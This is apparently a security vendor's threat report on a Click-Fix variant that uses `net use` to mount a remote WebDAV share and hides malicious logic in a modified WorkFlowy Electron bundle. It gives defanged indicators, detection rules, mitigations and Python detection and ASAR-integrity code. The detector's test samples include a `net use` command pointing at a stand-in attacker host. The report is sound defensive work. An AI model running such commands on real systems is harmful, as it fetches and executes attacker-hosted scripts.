Full Report
Disclaimer: This report has been prepared by the Threat Research Center to enhance cybersecurity awareness and support the strengthening of defense capabilities. It is based on independent research and observations of the current threat landscape available at the time of publication. The content is intended for informational and preparedness purposes only.
Analysis Summary
# Tool/Technique: Click-Fix (Net Use Variant)
## Overview
This is a sophisticated evolution of the "Click-Fix" (also known as "ClearFake") social engineering technique. Attackers trick users into executing malicious commands via the Windows Run dialog (`Win + R`) by posing as a website fix or CAPTCHA verification. This specific variant distinguishes itself by using SMB/WebDAV to map a remote drive and utilizing modified Electron application bundles to hide malicious logic.
## Technical Details
- **Type:** Technique / Malware Dropper
- **Platform:** Microsoft Windows
- **Capabilities:** Social engineering, remote drive mapping, defense evasion via legitimate binaries, C2 beaconing, and payload dropping.
- **First Seen:** January 2026 (C2 registration); Report published March 13, 2026.
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
  - T1566.002 - Phishing: Spearphishing Link
- **TA0002 - Execution**
  - T1204.002 - User Execution: Malicious File
  - T1059.001 - Command and Scripting Interpreter: PowerShell
  - T1059.003 - Command and Scripting Interpreter: Windows Command Shell
- **TA0005 - Defense Evasion**
  - T1027 - Obfuscated Files or Information (ASAR injection)
  - T1218 - System Binary Proxy Execution (WorkFlowy.exe)
- **TA0011 - Command and Control**
  - T1071.001 - Application Layer Protocol: Web Protocols
## Functionality
### Core Capabilities
- **Manipulated Execution:** Leverages the Windows Run dialog (`Win + R`) and clipboard pasting to bypass browser security controls and prompt-based warnings.
- **Remote Drive Mounting:** Uses `net use` to connect to a remote WebDAV server (`https[:]//94.156.170[.]255/webdav`), allowing the local execution of scripts hosted on the attacker's infrastructure.
- **Automated Cleanup:** The initial command includes a `net use /delete` instruction to remove the mapped drive immediately after the secondary script is launched, reducing the forensic footprint.
### Advanced Features
- **Electron Application Hijacking:** Instead of a standard PE malware file, the attack uses a legitimate, signed version of the "WorkFlowy" desktop app.
- **ASAR Injection:** Attackers modified the `main.js` file inside the `app.asar` archive. Because the primary executable is signed and legitimate, it frequently bypasses Endpoint Detection and Response (EDR) solutions.
- **Persistence/Identification:** Creates a victim identifier file at `%APPDATA%\id.txt`.
## Indicators of Compromise
- **File Hashes (ZIP/Payload):** (Note: Specific hashes for the modified `app.asar` were not provided in the text; researchers should look for modified Electron bundles.)
- **File Names:**
  - `update.cmd`
  - `flowy.zip`
  - `id.txt`
- **Network Indicators:**
  - `happyglamper[.]ro` (Phishing Landing Page)
  - `94.156.170[.]255` (WebDAV and File Hosting)
  - `cloudflare[.]report/forever/e/` (C2 Domain)
  - `144[.]31[.]165[.]173` (C2 Origin IP)
  - `play2go[.]cloud` (Associated Infrastructure)
- **Behavioral Indicators:**
  - Execution of `net use` with HTTPS URLs in the command line.
  - Unexpected creation of subdirectories in `%LOCALAPPDATA%\MyApp\`.
  - Modification of the `RunMRU` registry key containing `net use` or `powershell` commands.
## Associated Threat Actors
- While specific group names were not explicitly linked, this technique is a direct evolution of the TTPs used by groups operating **ClearFake** or **ClickFix** campaigns.
## Detection Methods
- **Behavioral Detection:** Monitor for instances of `cmd.exe` or `powershell.exe` being spawned directly from `explorer.exe` (via the Run dialog) containing the string "net use" or "Invoke-WebRequest".
- **Registry Monitoring:** Audit changes to the `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` key for suspicious PowerShell or CMD strings.
- **Network-Based Detection:** Alert on WebDAV traffic (typically over port 443) directed to non-standard external IP addresses.
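The behavioral and registry checks above, written out as detection logic over constructed telemetry. This is an added example, not code from the report or its authors: the event dictionaries are modelled on Sysmon Event ID 1 fields, the WebDAV hostname is a placeholder, and the RunMRU layout (one command per letter-named value ending in `\1`, ordered by `MRUList`) is the standard one for that key.

```python
"""Detect Click-Fix (net use variant) traces in process-creation events and in
RunMRU values. Added example, not the report's code; all input is constructed."""
import re

# The report's detection strings: net use pointed at an HTTPS (WebDAV) URL, or a
# PowerShell download cradle, launched from the Run dialog (parent explorer.exe).
NET_USE_HTTPS = re.compile(r"\bnet(1)?(\.exe)?\s+use\b.*https?://", re.I)
CRADLE = re.compile(r"invoke-webrequest", re.I)
RUNMRU_TERMS = re.compile(r"\bnet\s+use\b|powershell", re.I)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def flag_process_event(ev: dict) -> bool:
    """True for a shell spawned by explorer.exe whose command line matches."""
    if _basename(ev.get("ParentImage", "")) != "explorer.exe":
        return False
    if _basename(ev.get("Image", "")) not in SHELLS:
        return False
    cmd = ev.get("CommandLine", "")
    return bool(NET_USE_HTTPS.search(cmd) or CRADLE.search(cmd))

def flag_runmru(values: dict) -> list:
    """Return suspicious RunMRU commands, most recent first.
    Each command lives in a single-letter value with a trailing '\\1';
    the MRUList value lists those letters in most-recent-first order."""
    hits = []
    for letter in values.get("MRUList", ""):
        cmd = values.get(letter, "")
        if cmd.endswith("\\1"):
            cmd = cmd[:-2]
        if RUNMRU_TERMS.search(cmd):
            hits.append(cmd)
    return hits

# Constructed samples modelled on Sysmon Event ID 1 fields (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c net use z: https://attacker.example/webdav"},   # placeholder host
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"net use z: \\fileserver\share"},   # SMB mapping from a shell: benign here
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad"},
]
SAMPLE_RUNMRU = {"MRUList": "ba", "a": "notepad\\1",
                 "b": "cmd /c net use z: https://attacker.example/webdav\\1"}

def scan() -> dict:
    """Run both checks over the constructed samples."""
    return {"process_hits": [e["CommandLine"] for e in SAMPLE_EVENTS if flag_process_event(e)],
            "runmru_hits": flag_runmru(SAMPLE_RUNMRU)}
```

In production the event dictionaries would come from your EDR or Sysmon pipeline and the RunMRU values from `winreg` under `HKCU\...\Explorer\RunMRU`; the matching logic is unchanged.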
## Mitigation Strategies
- **User Education:** Train users to never paste and execute commands provided by websites claiming to "fix" browser errors or CAPTCHAs.
- **Host Hardening:** Restrict the use of the `net.exe` and `net1.exe` utilities for standard users where possible.
- **PowerShell Constrained Language Mode:** Implement CLM to limit the effectiveness of malicious PowerShell scripts.
- **ASAR Integrity:** Employ application control policies that validate the integrity of internal application resources, not just the primary `.exe`.
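One way to act on the ASAR integrity point: parse the `app.asar` header, pull out `main.js`, and compare its SHA-256 with a known-good value, so a modified bundle is caught even though the signed `.exe` is untouched. This is an added example, not code from the report or from Electron; `build_asar` is a helper that constructs a minimal archive in memory so the check can run offline, and the reader handles only the standard header layout (nested directories and unpacked entries are walked, but the optional `integrity` metadata is ignored).

```python
"""Extract main.js from an Electron app.asar and compare its SHA-256 with a
known-good value. Added example, not the report's or Electron's code; the
archive is constructed in memory by build_asar()."""
import hashlib
import json
import struct

def build_asar(files: dict) -> bytes:
    """Construct a flat ASAR archive for testing: {name: bytes} at the root."""
    header, blobs, offset = {"files": {}}, [], 0
    for name, data in files.items():
        header["files"][name] = {"size": len(data), "offset": str(offset)}
        blobs.append(data)
        offset += len(data)
    js = json.dumps(header).encode()
    padded = js + b"\0" * (-len(js) % 4)     # Pickle strings are 4-byte aligned
    header_pickle = struct.pack("<II", 4 + len(padded), len(js)) + padded
    size_pickle = struct.pack("<II", 4, len(header_pickle))
    return size_pickle + header_pickle + b"".join(blobs)

def read_asar(blob: bytes) -> dict:
    """Return {path: bytes} for every packed file. Layout: [u32 4][u32 header_size]
    [u32 payload_size][u32 json_len][json, padded][file data...]."""
    _, header_size = struct.unpack_from("<II", blob, 0)
    _, json_len = struct.unpack_from("<II", blob, 8)
    header = json.loads(blob[16:16 + json_len])
    data_start = 8 + header_size              # file offsets are relative to this
    out = {}
    def walk(node: dict, prefix: str) -> None:
        for name, entry in node["files"].items():
            if "files" in entry:              # directory
                walk(entry, prefix + name + "/")
            elif "offset" in entry:           # packed file (unpacked ones carry no offset)
                start = data_start + int(entry["offset"])
                out[prefix + name] = blob[start:start + entry["size"]]
    walk(header, "")
    return out

def file_digest(blob: bytes, path: str) -> str:
    """SHA-256 of one archived file; empty input if the path is missing."""
    return hashlib.sha256(read_asar(blob).get(path, b"")).hexdigest()

def main_js_is_trusted(blob: bytes, known_good_sha256: str) -> bool:
    """The resource-level integrity check the mitigation asks for."""
    return file_digest(blob, "main.js") == known_good_sha256
```

For a real deployment the known-good digest is taken from a clean copy of the vendor's release and the check is run against `resources\app.asar` on disk.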
## Related Tools/Techniques
- **ClearFake:** The predecessor tactic involving fake browser update overlays.
- **MSHTA Smuggling:** Previous Click-Fix versions utilized `mshta.exe` to execute remote HTA files.
- **App-Hopping:** Using legitimate signed Electron apps to proxy malicious code (similar to DLL Side-Loading).